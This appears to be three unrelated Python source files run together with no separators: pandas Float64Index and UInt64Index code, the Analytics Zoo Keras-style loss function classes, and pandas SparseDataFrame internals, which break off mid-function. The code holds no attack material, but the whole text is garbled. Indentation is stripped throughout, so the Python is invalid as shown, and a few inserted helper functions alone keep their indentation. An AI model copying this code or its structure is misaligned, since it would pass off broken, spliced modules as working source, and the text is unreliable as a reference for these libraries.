Ensure incoming data can be represented as uints.
"""
if not issubclass(data.dtype.type, np.unsignedinteger):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(obj, (ABCUInt64Index, ABCFloat64Index)) for obj in [self, other]
)
UInt64Index._add_numeric_methods()
UInt64Index._add_logical_methods()
_float64_descr_args = dict(
klass="Float64Index", dtype="float64", ltype="float", extra=""
)
class Float64Index(NumericIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _float64_descr_args
_typ = "float64index"
_engine_type = libindex.Float64Engine
_default_dtype = np.float64
@property
def inferred_type(self) -> str:
"""
Always 'floating' for ``Float64Index``
"""
return "floating"
@doc(Index.astype)
def astype(self, dtype, copy=True):
dtype = pandas_dtype(dtype)
if needs_i8_conversion(dtype):
raise TypeError(
f"Cannot convert Float64Index to dtype {dtype}; integer "
"values are required for conversion"
)
elif is_integer_dtype(dtype) and not is_extension_array_dtype(dtype):
# TODO(jreback); this can change once we have an EA Index type
# GH 13149
arr = astype_nansafe(self._values, dtype=dtype)
return Int64Index(arr, name=self.name)
return super().astype(dtype, copy=copy)
# ----------------------------------------------------------------
# Indexing Methods
@doc(Index._should_fallback_to_positional)
def _should_fallback_to_positional(self) -> bool:
return False
@doc(Index._convert_slice_indexer)
def _convert_slice_indexer(self, key: slice, kind: str):
assert kind in ["loc", "getitem"]
# We always treat __getitem__ slicing as label-based
# translate to locations
return self.slice_indexer(key.start, key.stop, key.step, kind=kind)
# ----------------------------------------------------------------
def _format_native_types(
self, na_rep="", float_format=None, decimal=".", quoting=None, **kwargs
):
from pandas.io.formats.format import FloatArrayFormatter
formatter = FloatArrayFormatter(
self._values,
na_rep=na_rep,
float_format=float_format,
decimal=decimal,
quoting=quoting,
fixed_width=False,
)
return formatter.get_result_as_array()
def equals(self, other) -> bool:
"""
Determines if two Index objects contain the same elements.
"""
if self is other:
return True
if not isinstance(other, Index):
return False
# need to compare nans locations and make sure that they are the same
# since nans don't compare equal this is a bit tricky
try:
if not isinstance(other, Float64Index):
other = self._constructor(other)
if not is_dtype_equal(self.dtype, other.dtype) or self.shape != other.shape:
return False
left, right = self._values, other._values
return ((left == right) | (self._isnan & other._isnan)).all()
except (TypeError, ValueError):
return False
def __contains__(self, other: Any) -> bool:
hash(other)
if super().__contains__(other):
return True
return is_float(other) and np.isnan(other) and self.hasnans
@doc(Index.get_loc)
def get_loc(self, key, method=None, tolerance=None):
if is_bool(key):
# Catch this to avoid accidentally casting to 1.0
raise KeyError(key)
if is_float(key) and np.isnan(key):
nan_idxs = self._nan_idxs
if not len(nan_idxs):
raise KeyError(key)
elif len(nan_idxs) == 1:
return nan_idxs[0]
return nan_idxs
return super().get_loc(key, method=method, tolerance=tolerance)
@cache_readonly
def is_unique(self) -> bool:
return super().is_unique and self._nan_idxs.size < 2
@doc(Index.isin)
def isin(self, values, level=None):
if level is not None:
self._validate_index_level(level)
return algorithms.isin(np.array(self), values)
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(
obj, (ABCInt64Index, ABCFloat64Index, ABCUInt64Index, ABCRangeIndex),
)
for obj in [self, other]
)
Float64Index._add_numeric_methods()
Float64Index._add_logical_methods_disabled()
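# Illustrative sketch (not part of pandas itself): Float64Index.__contains__ above
# special-cases NaN via ``hasnans``, since NaN never compares equal to itself.
# Assumes a standard pandas installation; the function name is for illustration only.
def _float64index_nan_demo():
    import numpy as np
    import pandas as pd
    idx = pd.Float64Index([1.0, np.nan])
    assert idx.hasnans
    assert np.nan in idx    # resolved by the hasnans branch, not by equality
    return idx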
|
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from zoo.pipeline.api.keras.base import ZooKerasCreator
from bigdl.nn.criterion import Criterion
from bigdl.util.common import JTensor
if sys.version >= '3':
long = int
unicode = str
class LossFunction(ZooKerasCreator, Criterion):
"""
The base class for Keras-style API objectives in Analytics Zoo.
"""
def __init__(self, jvalue, bigdl_type, *args):
super(Criterion, self).__init__(jvalue, bigdl_type, *args)
@classmethod
def of(cls, jloss, bigdl_type="float"):
"""
Create a Python LossFunction from a JavaObject.
# Arguments
jloss: A Java criterion object created by Py4j
"""
loss = LossFunction(bigdl_type, jloss)
loss.value = jloss
loss.bigdl_type = bigdl_type
return loss
class SparseCategoricalCrossEntropy(LossFunction):
"""
A loss often used in multi-class classification problems with SoftMax
as the last layer of the neural network.
By default, same as Keras, input(y_pred) is supposed to be probabilities of each class,
and target(y_true) is supposed to be the class label starting from 0.
# Arguments
log_prob_as_input: Boolean. Whether to accept log-probabilities or probabilities
as input. Default is False and inputs should be probabilities.
zero_based_label: Boolean. Whether target labels start from 0. Default is True.
If False, labels start from 1.
weights: A Numpy array. Weights of each class if you have an unbalanced training set.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
padding_value: Int. If the target is set to this value, the training process
will skip this sample. In other words, the forward process will
return zero output and the backward process will also return
zero grad_input. Default is -1.
>>> loss = SparseCategoricalCrossEntropy()
creating: createZooKerasSparseCategoricalCrossEntropy
>>> import numpy as np
>>> np.random.seed(1128)
>>> weights = np.random.uniform(0, 1, (2,)).astype("float32")
>>> loss = SparseCategoricalCrossEntropy(weights=weights)
creating: createZooKerasSparseCategoricalCrossEntropy
"""
def __init__(self, log_prob_as_input=False, zero_based_label=True,
weights=None, size_average=True, padding_value=-1, bigdl_type="float"):
super(SparseCategoricalCrossEntropy, self).__init__(None, bigdl_type,
log_prob_as_input,
zero_based_label,
JTensor.from_ndarray(weights),
size_average,
padding_value)
class MeanAbsoluteError(LossFunction):
"""
A loss that measures the mean absolute value of the element-wise difference
between the input and the target.
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = MeanAbsoluteError()
creating: createZooKerasMeanAbsoluteError
"""
def __init__(self, size_average=True, bigdl_type="float"):
super(MeanAbsoluteError, self).__init__(None, bigdl_type,
size_average)
mae = MAE = MeanAbsoluteError
class BinaryCrossEntropy(LossFunction):
"""
A loss that measures the Binary Cross Entropy between the target and the output
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
weights: weights over the input dimension
>>> loss = BinaryCrossEntropy()
creating: createZooKerasBinaryCrossEntropy
"""
def __init__(self, weights=None, size_average=True, bigdl_type="float"):
super(BinaryCrossEntropy, self).__init__(None, bigdl_type,
JTensor.from_ndarray(weights),
size_average)
class CategoricalCrossEntropy(LossFunction):
"""
This is the same as the cross entropy criterion, except the target tensor is a one-hot tensor
>>> loss = CategoricalCrossEntropy()
creating: createZooKerasCategoricalCrossEntropy
"""
def __init__(self, bigdl_type="float"):
super(CategoricalCrossEntropy, self).__init__(None, bigdl_type)
class CosineProximity(LossFunction):
"""
The negative of the mean cosine proximity between predictions and targets.
The cosine proximity is defined as below:
x'(i) = x(i) / sqrt(max(sum(x(i)^2), 1e-12))
y'(i) = y(i) / sqrt(max(sum(y(i)^2), 1e-12))
cosine_proximity(x, y) = mean(-1 * x'(i) * y'(i))
>>> loss = CosineProximity()
creating: createZooKerasCosineProximity
"""
def __init__(self, bigdl_type="float"):
super(CosineProximity, self).__init__(None, bigdl_type)
class Hinge(LossFunction):
"""
Creates a criterion that optimizes a two-class classification
hinge loss (margin-based loss) between input x (a Tensor of dimension 1) and output y.
# Arguments:
margin: Float. Default is 1.0.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = Hinge()
creating: createZooKerasHinge
"""
def __init__(self, margin=1.0, size_average=True, bigdl_type="float"):
super(Hinge, self).__init__(None, bigdl_type, float(margin), size_average)
class KullbackLeiblerDivergence(LossFunction):
"""
Loss calculated as:
y_true = K.clip(y_true, K.epsilon(), 1)
y_pred = K.clip(y_pred, K.epsilon(), 1)
and the output is K.sum(y_true * K.log(y_true / y_pred), axis=-1)
>>> loss = KullbackLeiblerDivergence()
creating: createZooKerasKullbackLeiblerDivergence
"""
def __init__(self, bigdl_type="float"):
super(KullbackLeiblerDivergence, self).__init__(None, bigdl_type)
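# Illustrative NumPy sketch (not the Analytics Zoo implementation): the formula quoted
# in the KullbackLeiblerDivergence docstring above, with a hypothetical epsilon value
# standing in for K.epsilon().
def _kld_numpy_demo(y_true, y_pred, epsilon=1e-7):
    import numpy as np
    y_true = np.clip(np.asarray(y_true, dtype="float64"), epsilon, 1.0)
    y_pred = np.clip(np.asarray(y_pred, dtype="float64"), epsilon, 1.0)
    return np.sum(y_true * np.log(y_true / y_pred), axis=-1)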
class MeanAbsolutePercentageError(LossFunction):
"""
It calculates diff = K.abs((y - x) / K.clip(K.abs(y), K.epsilon(), Double.MaxValue))
and returns 100 * K.mean(diff) as output
>>> loss = MeanAbsolutePercentageError()
creating: createZooKerasMeanAbsolutePercentageError
"""
def __init__(self, bigdl_type="float"):
super(MeanAbsolutePercentageError, self).__init__(None, bigdl_type)
mape = MAPE = MeanAbsolutePercentageError
class MeanSquaredError(LossFunction):
"""
A loss that measures the mean squared value of the element-wise difference
between the input and the target.
# Arguments
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. Default is True. If False, the losses are instead
summed for each mini-batch.
>>> loss = MeanSquaredError()
creating: createZooKerasMeanSquaredError
"""
def __init__(self, size_average=True, bigdl_type="float"):
super(MeanSquaredError, self).__init__(None, bigdl_type,
size_average)
mse = MSE = MeanSquaredError
class MeanSquaredLogarithmicError(LossFunction):
"""
It calculates:
first_log = K.log(K.clip(y, K.epsilon(), Double.MaxValue) + 1.)
second_log = K.log(K.clip(x, K.epsilon(), Double.MaxValue) + 1.)
and output K.mean(K.square(first_log - second_log))
>>> loss = MeanSquaredLogarithmicError()
creating: createZooKerasMeanSquaredLogarithmicError
"""
def __init__(self, bigdl_type="float"):
super(MeanSquaredLogarithmicError, self).__init__(None, bigdl_type)
msle = MSLE = MeanSquaredLogarithmicError
class Poisson(LossFunction):
"""
Loss calculated as: K.mean(y_pred - y_true * K.log(y_pred + K.epsilon()), axis=-1)
>>> loss = Poisson()
creating: createZooKerasPoisson
"""
def __init__(self, bigdl_type="float"):
super(Poisson, self).__init__(None, bigdl_type)
class SquaredHinge(LossFunction):
"""
Creates a criterion that optimizes a two-class classification
squared hinge loss (margin-based loss)
between input x (a Tensor of dimension 1) and output y.
# Arguments:
margin: Float. Default is 1.0.
size_average: Boolean. Whether losses are averaged over observations for each
mini-batch. If False, the losses are instead summed for each
mini-batch. Default is False.
>>> loss = SquaredHinge()
creating: createZooKerasSquaredHinge
"""
def __init__(self, margin=1.0, size_average=False, bigdl_type="float"):
super(SquaredHinge, self).__init__(None, bigdl_type, float(margin), size_average)
class RankHinge(LossFunction):
"""
Hinge loss for pairwise ranking problems.
# Arguments:
margin: Float. Default is 1.0.
>>> loss = RankHinge()
creating: createZooKerasRankHinge
"""
def __init__(self, margin=1.0, bigdl_type="float"):
super(RankHinge, self).__init__(None, bigdl_type, float(margin))
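# Illustrative usage sketch (assumption: an Analytics Zoo Keras-style model object with a
# Keras-like ``compile`` method is available; that API is not defined in this module).
def _compile_with_custom_loss(model):
    # Any of the loss objects defined above can be passed wherever a criterion is expected.
    model.compile(optimizer="adam", loss=BinaryCrossEntropy(size_average=True))
    return model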
|
|
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
from __future__ import division
import warnings
import numpy as np
from pandas._libs.sparse import BlockIndex, get_blocks
import pandas.compat as compat
from pandas.compat import lmap
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender
from pandas.core.dtypes.cast import find_common_type, maybe_upcast
from pandas.core.dtypes.common import ensure_platform_int, is_scipy_sparse
from pandas.core.dtypes.missing import isna, notna
import pandas.core.algorithms as algos
from pandas.core.arrays.sparse import SparseArray, SparseDtype
import pandas.core.common as com
from pandas.core.frame import DataFrame
import pandas.core.generic as generic
from pandas.core.index import Index, MultiIndex, ensure_index
import pandas.core.indexes.base as ibase
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays)
from pandas.core.internals.construction import extract_index, prep_ndarray
import pandas.core.ops as ops
from pandas.core.series import Series
from pandas.core.sparse.series import SparseSeries
# pylint: disable=E1101,E1103,W0231,E0202
_shared_doc_kwargs = dict(klass='SparseDataFrame')
class SparseDataFrame(DataFrame):
"""
DataFrame containing sparse floating point data in the form of SparseSeries
objects
Parameters
----------
data : same types as can be passed to DataFrame or scipy.sparse.spmatrix
.. versionchanged:: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like, optional
columns : array-like, optional
default_kind : {'block', 'integer'}, default 'block'
Default sparse kind for converting Series to SparseSeries. Will not
override SparseSeries passed into constructor
default_fill_value : float
Default fill_value for converting Series to SparseSeries
(default: nan). Will not override SparseSeries passed in.
"""
_subtyp = 'sparse_frame'
def __init__(self, data=None, index=None, columns=None, default_kind=None,
default_fill_value=None, dtype=None, copy=False):
# pick up the defaults from the Sparse structures
if isinstance(data, SparseDataFrame):
if index is None:
index = data.index
if columns is None:
columns = data.columns
if default_fill_value is None:
default_fill_value = data.default_fill_value
if default_kind is None:
default_kind = data.default_kind
elif isinstance(data, (SparseSeries, SparseArray)):
if index is None:
index = data.index
if default_fill_value is None:
default_fill_value = data.fill_value
if columns is None and hasattr(data, 'name'):
columns = [data.name]
if columns is None:
raise Exception("cannot pass a series w/o a name or columns")
data = {columns[0]: data}
if default_fill_value is None:
default_fill_value = np.nan
if default_kind is None:
default_kind = 'block'
self._default_kind = default_kind
self._default_fill_value = default_fill_value
if is_scipy_sparse(data):
mgr = self._init_spmatrix(data, index, columns, dtype=dtype,
fill_value=default_fill_value)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, index, columns, dtype=dtype)
elif isinstance(data, SparseDataFrame):
mgr = self._init_mgr(data._data,
dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, DataFrame):
mgr = self._init_dict(data, data.index, data.columns, dtype=dtype)
elif isinstance(data, Series):
mgr = self._init_dict(data.to_frame(), data.index,
columns=None, dtype=dtype)
elif isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif data is None:
data = DataFrame()
if index is None:
index = Index([])
else:
index = ensure_index(index)
if columns is None:
columns = Index([])
else:
for c in columns:
data[c] = SparseArray(np.nan, index=index,
kind=self._default_kind,
fill_value=self._default_fill_value)
mgr = to_manager(data, columns, index)
if dtype is not None:
mgr = mgr.astype(dtype)
else:
msg = ('SparseDataFrame called with unknown type "{data_type}" '
'for data argument')
raise TypeError(msg.format(data_type=type(data).__name__))
generic.NDFrame.__init__(self, mgr)
@property
def _constructor(self):
return SparseDataFrame
_constructor_sliced = SparseSeries
def _init_dict(self, data, index, columns, dtype=None):
# pre-filter out columns if we passed it
if columns is not None:
columns = ensure_index(columns)
data = {k: v for k, v in compat.iteritems(data) if k in columns}
else:
keys = com.dict_keys_to_ordered_list(data)
columns = Index(keys)
if index is None:
index = extract_index(list(data.values()))
def sp_maker(x):
return SparseArray(x, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=True, dtype=dtype)
sdict = {}
for k, v in compat.iteritems(data):
if isinstance(v, Series):
# Force alignment, no copy necessary
if not v.index.equals(index):
v = v.reindex(index)
if not isinstance(v, SparseSeries):
v = sp_maker(v.values)
elif isinstance(v, SparseArray):
v = v.copy()
else:
if isinstance(v, dict):
v = [v.get(i, np.nan) for i in index]
v = sp_maker(v)
if index is not None and len(v) != len(index):
msg = "Length of passed values is {}, index implies {}"
raise ValueError(msg.format(len(v), len(index)))
sdict[k] = v
if len(columns.difference(sdict)):
# TODO: figure out how to handle this case, all nan's?
# add in any other columns we want to have (completeness)
nan_arr = np.empty(len(index), dtype='float64')
nan_arr.fill(np.nan)
nan_arr = SparseArray(nan_arr, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=False)
sdict.update((c, nan_arr) for c in columns if c not in sdict)
return to_manager(sdict, columns, index)
def _init_matrix(self, data, index, columns, dtype=None):
"""
Init self from ndarray or list of lists.
"""
data = prep_ndarray(data, copy=False)
index, columns = self._prep_index(data, index, columns)
data = {idx: data[:, i] for i, idx in enumerate(columns)}
return self._init_dict(data, index, columns, dtype)
def _init_spmatrix(self, data, index, columns, dtype=None,
fill_value=None):
"""
Init self from scipy.sparse matrix.
"""
index, columns = self._prep_index(data, index, columns)
data = data.tocoo()
N = len(index)
# Construct a dict of SparseSeries
sdict = {}
values = Series(data.data, index=data.row, copy=False)
for col, rowvals in values.groupby(data.col):
# get_blocks expects int32 row indices in sorted order
rowvals = rowvals.sort_index()
rows = rowvals.index.values.astype(np.int32)
blocs, blens = get_blocks(rows)
sdict[columns[col]] = SparseSeries(
rowvals.values, index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, blocs, blens))
# Add any columns that were empty and thus not grouped on above
sdict.update({column: SparseSeries(index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, [], []))
for column in columns
if column not in sdict})
return self._init_dict(sdict, index, columns, dtype)
def _prep_index(self, data, index, columns):
N, K = data.shape
if index is None:
index = ibase.default_index(N)
if columns is None:
columns = ibase.default_index(K)
if len(columns) != K:
raise ValueError('Column length mismatch: {columns} vs. {K}'
.format(columns=len(columns), K=K))
if len(index) != N:
raise ValueError('Index length mismatch: {index} vs. {N}'
.format(index=len(index), N=N))
return index, columns
def to_coo(self):
"""
Return the contents of the frame as a sparse SciPy COO matrix.
.. versionadded:: 0.20.0
Returns
-------
coo_matrix : scipy.sparse.spmatrix
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
The dtype will be the lowest-common-denominator type (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. By numpy.find_common_type convention, mixing int64 and
uint64 will result in a float64 dtype.
"""
try:
from scipy.sparse import coo_matrix
except ImportError:
raise ImportError('Scipy is not installed')
dtype = find_common_type(self.dtypes)
if isinstance(dtype, SparseDtype):
dtype = dtype.subtype
cols, rows, datas = [], [], []
for col, name in enumerate(self):
s = self[name]
row = s.sp_index.to_int_index().indices
cols.append(np.repeat(col, len(row)))
rows.append(row)
datas.append(s.sp_values.astype(dtype, copy=False))
cols = np.concatenate(cols)
rows = np.concatenate(rows)
datas = np.concatenate(datas)
return coo_matrix((datas, (rows, cols)), shape=self.shape)
def __array_wrap__(self, result):
return self._constructor(
result, index=self.index, columns=self.columns,
default_kind=self._default_kind,
default_fill_value=self._default_fill_value).__finalize__(self)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
_default_fill_value=self._default_fill_value,
_default_kind=self._default_kind)
def _unpickle_sparse_frame_compat(self, state):
"""
Original pickle format
"""
series, cols, idx, fv, kind = state
if not isinstance(cols, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
columns = _unpickle_array(cols)
else:
columns = cols
if not isinstance(idx, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
index = _unpickle_array(idx)
else:
index = idx
series_dict = DataFrame()
for col, (sp_index, sp_values) in compat.iteritems(series):
series_dict[col] = SparseSeries(sp_values, sparse_index=sp_index,
fill_value=fv)
self._data = to_manager(series_dict, columns, index)
self._default_fill_value = fv
self._default_kind = kind
def to_dense(self):
"""
Convert to dense DataFrame
Returns
-------
df : DataFrame
"""
data = {k: v.to_dense() for k, v in compat.iteritems(self)}
return DataFrame(data, index=self.index, columns=self.columns)
def _apply_columns(self, func):
"""
Get a new SparseDataFrame by applying func to each column
"""
new_data = {col: func(series)
for col, series in compat.iteritems(self)}
return self._constructor(
data=new_data, index=self.index, columns=self.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def astype(self, dtype):
return self._apply_columns(lambda x: x.astype(dtype))
def copy(self, deep=True):
"""
Make a copy of this SparseDataFrame
"""
result = super(SparseDataFrame, self).copy(deep=deep)
result._default_fill_value = self._default_fill_value
result._default_kind = self._default_kind
return result
@property
def default_fill_value(self):
return self._default_fill_value
@property
def default_kind(self):
return self._default_kind
@property
def density(self):
"""
Ratio of non-sparse points to total (dense) data points
represented in the frame
"""
tot_nonsparse = sum(ser.sp_index.npoints
for _, ser in compat.iteritems(self))
tot = len(self.index) * len(self.columns)
return tot_nonsparse / float(tot)
def fillna(self, value=None, method=None, axis=0, inplace=False,
limit=None, downcast=None):
new_self = super(SparseDataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast)
if not inplace:
self = new_self
# set the fill value if we are filling as a scalar with nothing special
# going on
if (value is not None and value == value and method is None and
limit is None):
self._default_fill_value = value
if not inplace:
return self
# ----------------------------------------------------------------------
# Support different internal representation of SparseDataFrame
def _sanitize_column(self, key, value, **kwargs):
"""
Creates a new SparseArray from the input value.
Parameters
----------
key : object
value : scalar, Series, or array-like
kwargs : dict
Returns
-------
sanitized_column : SparseArray
"""
def sp_maker(x, index=None):
return SparseArray(x, index=index,
fill_value=self._default_fill_value,
kind=self._default_kind)
if isinstance(value, SparseSeries):
clean = value.reindex(self.index).as_sparse_array(
fill_value=self._default_fill_value, kind=self._default_kind)
elif isinstance(value, SparseArray):
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = value
elif hasattr(value, '__iter__'):
if isinstance(value, Series):
clean = value.reindex(self.index)
if not isinstance(value, SparseSeries):
clean = sp_maker(clean)
else:
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = sp_maker(value)
# Scalar
else:
clean = sp_maker(value, self.index)
# always return a SparseArray!
return clean
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable is True:
series = self._iget_item_cache(col)
else:
series = self._get_item_cache(col)
return series._get_value(index, takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Notes
-----
This method *always* returns a new object. It is currently not
particularly efficient (and potentially very expensive) but is provided
for API compatibility with DataFrame
Returns
-------
frame : DataFrame
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
dense = self.to_dense()._set_value(
index, col, value, takeable=takeable)
return dense.to_sparse(kind=self._default_kind,
fill_value=self._default_fill_value)
_set_value.__doc__ = set_value.__doc__
def _slice(self, slobj, axis=0, kind=None):
if axis == 0:
new_index = self.index[slobj]
new_columns = self.columns
else:
new_index = self.index
new_columns = self.columns[slobj]
return self.reindex(index=new_index, columns=new_columns)
def xs(self, key, axis=0, copy=False):
"""
Returns a row (cross-section) from the SparseDataFrame as a Series
object.
Parameters
----------
key : some index contained in the index
Returns
-------
xs : Series
"""
if axis == 1:
data = self[key]
return data
i = self.index.get_loc(key)
data = self.take([i]).get_values()[0]
return Series(data, index=self.columns)
# ----------------------------------------------------------------------
# Arithmetic-related methods
def _combine_frame(self, other, func, fill_value=None, level=None):
if level is not None:
raise NotImplementedError("'level' argument is not supported")
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
if self.empty and other.empty:
return self._constructor(index=new_index).__finalize__(self)
new_data = {}
if fill_value is not None:
# TODO: be a bit more intelligent here
for col in new_columns:
if col in this and col in other:
dleft = this[col].to_dense()
dright = other[col].to_dense()
result = dleft._binop(dright, func, fill_value=fill_value)
result = result.to_sparse(fill_value=this[col].fill_value)
new_data[col] = result
else:
for col in new_columns:
if col in this and col in other:
new_data[col] = func(this[col], other[col])
new_fill_value = self._get_op_result_fill_value(other, func)
return self._constructor(data=new_data, index=new_index,
columns=new_columns,
default_fill_value=new_fill_value
).__finalize__(self)
def _combine_match_index(self, other, func, level=None):
new_data = {}
if level is not None:
raise NotImplementedError("'level' argument is not supported")
this, other = self.align(other, join='outer', axis=0, level=level,
copy=False)
for col, series in compat.iteritems(this):
new_data[col] = func(series.values, other.values)
fill_value = self._get_op_result_fill_value(other, func)
return self._constructor(
new_data, index=this.index, columns=self.columns,
default_fill_value=fill_value).__finalize__(self)
def _combine_match_columns(self, other, func, level=None):
# patched version of DataFrame._combine_match_columns to account for
# NumPy circumventing __rsub__ with float64 types, e.g.: 3.0 - series,
# where 3.0 is numpy.float64 and series is a SparseSeries. Still
# possible for this to happen, which is bothersome
if level is not None:
raise NotImplementedError("'level' argument is not supported")
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
assert left.columns.equals(right.index)
new_data = {}
for col in left.columns:
new_data[col] = func(left[col], float(right[col]))
return self._constructor(
new_data, index=left.index, columns=left.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def _combine_const(self, other, func):
return self._apply_columns(lambda x: func(x, other))
def _get_op_result_fill_value(self, other, func):
own_default = self.default_fill_value
if isinstance(other, DataFrame):
# i.e. called from _combine_frame
other_default = getattr(other, 'default_fill_value', np.nan)
# if the fill values are the same use them? or use a valid one
if own_default == other_default:
# TODO: won't this evaluate as False if both are np.nan?
fill_value = own_default
elif np.isnan(own_default) and not np.isnan(other_default):
fill_value = other_default
elif not np.isnan(own_default) and np.isnan(other_default):
fill_value = own_default
else:
fill_value = None
elif isinstance(other, SparseSeries):
# i.e. called from _combine_match_index
# fill_value is a function of our operator
if isna(other.fill_value) or isna(own_default):
fill_value = np.nan
else:
fill_value = func(np.float64(own_default),
np.float64(other.fill_value))
else:
raise NotImplementedError(type(other))
return fill_value
def _reindex_index(self, index, method, copy, level, fill_value=np.nan,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if self.index.equals(index):
if copy:
return self.copy()
else:
return self
if len(self.index) == 0:
return self._constructor(
index=index, columns=self.columns).__finalize__(self)
indexer = self.index.get_indexer(index, method, limit=limit)
indexer = ensure_platform_int(indexer)
mask = indexer == -1
need_mask = mask.any()
new_series = {}
for col, series in self.iteritems():
if mask.all():
continue
values = series.values
# .take returns SparseArray
new = values.take(indexer)
if need_mask:
new = new.values
# convert integer to float if necessary. need to do a lot
# more than that, handle boolean etc also
new, fill_value = maybe_upcast(new, fill_value=fill_value)
np.putmask(new, mask, fill_value)
new_series[col] = new
return self._constructor(
new_series, index=index, columns=self.columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_columns(self, columns, method, copy, level, fill_value=None,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if notna(fill_value):
raise NotImplementedError("'fill_value' argument is not supported")
if limit:
raise NotImplementedError("'limit' argument is not supported")
if method is not None:
raise NotImplementedError("'method' argument is not supported")
# TODO: fill value handling
sdict = {k: v for k, v in compat.iteritems(self) if k in columns}
return self._constructor(
sdict, index=self.index, columns=columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_with_indexers(self, reindexers, method=None, fill_value=None,
limit=None, copy=False, allow_dups=False):
if method is not None or limit is not None:
raise NotImplementedError("cannot reindex with a method or limit "
"with sparse")
if fill_value is None:
fill_value = np.nan
reindexers = {self._get_axis_number(a): val
for (a, val) in compat.iteritems(reindexers)}
index, row_indexer = reindexers.get(0, (None, None))
columns, col_indexer = reindexers.get(1, (None, None))
if columns is None:
columns = self.columns
new_arrays = {}
for col in columns:
if col not in self:
continue
if row_indexer is not None:
new_arrays[col] = algos.take_1d(self[col].get_values(),
row_indexer,
fill_value=fill_value)
else:
new_arrays[col] = self[col]
return self._constructor(new_arrays, index=index,
columns=columns).__finalize__(self)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
if on is not None:
raise NotImplementedError("'on' keyword parameter is not yet "
"implemented")
return self._join_index(other, how, lsuffix, rsuffix)
def _join_index(self, other, how, lsuffix, rsuffix):
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = SparseDataFrame(
{other.name: other},
default_fill_value=self._default_fill_value)
join_index = self.index.join(other.index, how=how)
this = self.reindex(join_index)
other = other.reindex(join_index)
this, other = this._maybe_rename_join(other, lsuffix, rsuffix)
from pandas import concat
return concat([this, other], axis=1, verify_integrity=True)
def _maybe_rename_join(self, other, lsuffix, rsuffix):
to_rename = self.columns.intersection(other.columns)
if len(to_rename) > 0:
if not lsuffix and not rsuffix:
raise ValueError('columns overlap but no suffix specified: '
'{to_rename}'.format(to_rename=to_rename))
def lrenamer(x):
if x in to_rename:
return '{x}{lsuffix}'.format(x=x, lsuffix=lsuffix)
return x
def rrenamer(x):
if x in to_rename:
return '{x}{rsuffix}'.format(x=x, rsuffix=rsuffix)
